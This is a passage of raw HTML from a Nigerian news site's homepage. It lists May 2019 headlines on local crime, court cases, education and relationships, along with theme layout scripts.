href="https://thenationonlineng.net/i-never-authorised-arrest-of-benin-chief-priest-edo-cp/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="IPOB Police, Anambra, Ondo Zamfara Police Two Katsina Man Benin Edo, Police, Jigawa, Ondo PSC, Police, Anambra, Makurdi" data-src="https://thenationonlineng.net/wp-content/uploads/2019/01/Nigeria-Police-350x250.png" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/01/Nigeria-Police-350x250.png 350w, https://thenationonlineng.net/wp-content/uploads/2019/01/Nigeria-Police-120x86.png 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/i-never-authorised-arrest-of-benin-chief-priest-edo-cp/">I never authorised arrest of Benin Chief Priest – Edo CP</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/i-never-authorised-arrest-of-benin-chief-priest-edo-cp/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040780 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/driver-in-court-for-assaulting-stepdaughters/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="229" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Court" data-src="https://thenationonlineng.net/wp-content/uploads/2018/11/court-1.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2018/11/court-1.jpg 500w, https://thenationonlineng.net/wp-content/uploads/2018/11/court-1-260x170.jpg 260w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/driver-in-court-for-assaulting-stepdaughters/">Driver in court for assaulting stepdaughters</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/driver-in-court-for-assaulting-stepdaughters/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040766 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/ambode-weve-fulfilled-our-cardinal-promises-to-the-people/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Ambode: we’ve fulfilled our cardinal promises to the people" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Ambode-3-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Ambode-3-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Ambode-3-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ambode-weve-fulfilled-our-cardinal-promises-to-the-people/">Ambode: we’ve fulfilled our cardinal promises to the people</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/ambode-weve-fulfilled-our-cardinal-promises-to-the-people/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040767 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/group-family-petition-ig-over-ticketers-death/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="family petition IG over ticketer&#039;s death" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/igp-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/igp-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/igp-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/group-family-petition-ig-over-ticketers-death/">Group, family petition IG over ticketer&#8217;s death</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/group-family-petition-ig-over-ticketers-death/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040952 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/bad-parenting-bane-of-societal-decadence/"><div class="thumbnail-container animate-lazy size-715 "><img width="300" height="233" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="‘Bad parenting bane of societal decadence’" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/BAD-PARENTING.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/BAD-PARENTING.jpg 300w, https://thenationonlineng.net/wp-content/uploads/2019/05/BAD-PARENTING-219x170.jpg 219w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/bad-parenting-bane-of-societal-decadence/">‘Bad parenting bane of societal decadence’</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/bad-parenting-bane-of-societal-decadence/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040771 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/businessman-charged-with-slapping-estate-manager/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Latest Nigerian News" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/court-11-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/court-11-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/court-11-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/businessman-charged-with-slapping-estate-manager/">Businessman charged with slapping estate manager</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/businessman-charged-with-slapping-estate-manager/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040774 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/court-remands-two-for-sale-of-substandard-gas-cylinders/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="sale of substandard gas cylinders in Nigeria" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/court-10-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/court-10-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/court-10-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/court-remands-two-for-sale-of-substandard-gas-cylinders/">Court remands two for &#8216;sale of substandard gas cylinders&#8217;</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/court-remands-two-for-sale-of-substandard-gas-cylinders/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040777 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/banker-gets-n500000-bail-for-alleged-n4-4m-theft/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Banker gets bail for heft" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/court-8-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/court-8-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/court-8-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/banker-gets-n500000-bail-for-alleged-n4-4m-theft/">Banker gets N500,000 bail for alleged N4.4m theft</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/banker-gets-n500000-bail-for-alleged-n4-4m-theft/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040786 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news-update tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/how-i-was-drugged-gang-raped-at-hotel/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="rape in lagos" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/court-9-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/court-9-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/court-9-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/how-i-was-drugged-gang-raped-at-hotel/">‘How I was drugged, gang-raped at hotel’</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/how-i-was-drugged-gang-raped-at-hotel/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040784 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/two-rape-suspects-remanded/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Two rape suspects remanded" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/court-6-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/court-6-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/court-6-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/two-rape-suspects-remanded/">Two rape suspects remanded</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/two-rape-suspects-remanded/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> <div class="jeg_block_nav "> <a href="#" class="prev disabled" title="Previous"><i class="fa fa-angle-left"></i></a> <a href="#" class="next " title="Next"><i class="fa fa-angle-right"></i></a> </div> </div> <script>var jnews_module_915165_13_5cdd84c99a62c = {"header_icon":"","first_title":"City Beats","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/city-beats\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"12","post_offset":"0","unique_content":"unique1","include_post":"","exclude_post":"1041274,1041249,1041236,1041223,1041209,1041194,1041188,1041176,1041155,1040649,1041130,1041101","include_category":"256","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"nextprev","pagination_nextprev_showtext":"","pagination_number_post":"3","pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":".vc_custom_1554706624525{background-color: #ffffff !important;}","compatible_column_notice":"","paged":1,"column_class":"jeg_col_2o3","class":"jnews_block_22"};</script> </div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 vc_hidden-lg vc_hidden-md"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_2o3 jnews_module_915165_14_5cdd84c9ae890 " data-unique="jnews_module_915165_14_5cdd84c9ae890"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><span>City Beats</span></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts jeg_load_more_flag"> <article class="jeg_post jeg_pl_md_box post-1041265 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news-update tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="50-yr-old woman arrested for maid trafficking" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190516-WA0005-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190516-WA0005-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190516-WA0005-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/">50-yr-old woman arrested for maid trafficking</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article><article class="jeg_post jeg_pl_md_box post-1041231 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-cybercrime"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Cybercrime suspects in Ibadan unleashes dog on EFCC" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Cybercrime-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Cybercrime-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Cybercrime-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/">Cybercrime suspects unleash dog on EFCC operatives</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041194 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/lagos-assembly-set-to-address-building-collapse-with-laws-regulations/">Lagos Assembly set to address building collapse with laws, regulations</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041145 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/i-never-authorised-arrest-of-benin-chief-priest-edo-cp/">I never authorised arrest of Benin Chief Priest – Edo CP</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040780 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/driver-in-court-for-assaulting-stepdaughters/">Driver in court for assaulting stepdaughters</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040766 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ambode-weve-fulfilled-our-cardinal-promises-to-the-people/">Ambode: we’ve fulfilled our cardinal promises to the people</a> </h3> </div> </article> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_14_5cdd84c9ae890 = {"header_icon":"","first_title":"City Beats","second_title":"","url":"","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"256","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_2o3","class":"jnews_block_24"};</script> </div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_15_5cdd84c9b8ac4 " data-unique="jnews_module_915165_15_5cdd84c9b8ac4"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/education-news-nigeria/"><span>Education</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1041144 post type-post status-publish format-standard has-post-thumbnail hentry category-education-news-nigeria category-news-update tag-lagos-state-university-23rd-convocation"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/breaking-osinbajo-promises-fgs-collaboration-with-lasu-on-stem/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="FG collaborates wth Lasu" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/PIC-4-LASU-convocation-lecture-1-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/PIC-4-LASU-convocation-lecture-1-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/PIC-4-LASU-convocation-lecture-1-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-osinbajo-promises-fgs-collaboration-with-lasu-on-stem/">Breaking: Osinbajo promises FG&#8217;s collaboration with Lasu on STEM</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/breaking-osinbajo-promises-fgs-collaboration-with-lasu-on-stem/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1040869 post type-post status-publish format-standard has-post-thumbnail hentry category-education-news-nigeria tag-franklin-ekene-ezeunala tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/what-age-for-varsity-admission/">What age for varsity admission?</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040865 post type-post status-publish format-standard hentry category-education-news-nigeria tag-nollywoord tag-pau-msc"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/pau-msc-in-film-production-to-help-nollywoord/">PAU MSc in Film Production to help Nollywoord</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040853 post type-post status-publish format-standard hentry category-education-news-nigeria tag-bishop-urges tag-collapse"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/save-wesley-varsity-from-collapse-bishop-urges/">Save Wesley varsity from collapse, Bishop urges</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040852 post type-post status-publish format-standard has-post-thumbnail hentry category-education-news-nigeria category-news tag-ekiti-state tag-erelu-bisi-fayemi tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/many-out-of-school-children-are-girls-says-governors-wife/">Many out-of-school children are girls, says governor’s wife</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040851 post type-post status-publish format-standard has-post-thumbnail hentry category-education-news-nigeria tag-nigeria-news tag-nigerian-newspaper tag-stanbicibtc-bank tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/bank-ngo-promote-financial-literacy-with-money-bee/">Bank, NGO promote financial literacy with &#8216;Money Bee&#8217;</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_15_5cdd84c9b8ac4 = {"header_icon":"","first_title":"Education","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/education-news-nigeria\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"12","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_16_5cdd84c9c25a6 " data-unique="jnews_module_915165_16_5cdd84c9c25a6"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/saturday-magazine/weekend-treat/top-relationship-tips-advice/"><span>Relationships</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-678385 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-online-special category-top-relationship-tips-advice tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/10-ways-to-enjoy-your-wedding-day-to-the-fullest/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="10 ways to enjoy your wedding day to the fullest" data-src="https://thenationonlineng.net/wp-content/uploads/2017/05/Black-Tie-Maryland-Wedding-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2017/05/Black-Tie-Maryland-Wedding-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2017/05/Black-Tie-Maryland-Wedding-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2017/05/Black-Tie-Maryland-Wedding-750x533.jpg 750w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/10-ways-to-enjoy-your-wedding-day-to-the-fullest/">10 ways to enjoy your wedding day to the fullest</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/10-ways-to-enjoy-your-wedding-day-to-the-fullest/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1040485 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-top-relationship-tips-advice tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/why-nigerian-men-delay-marriage-proposals/">Why Nigerian men delay marriage proposals</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1029273 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-online-special category-top-relationship-tips-advice tag-adeyinka-akintunde tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper tag-the-nation-nigeria"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a 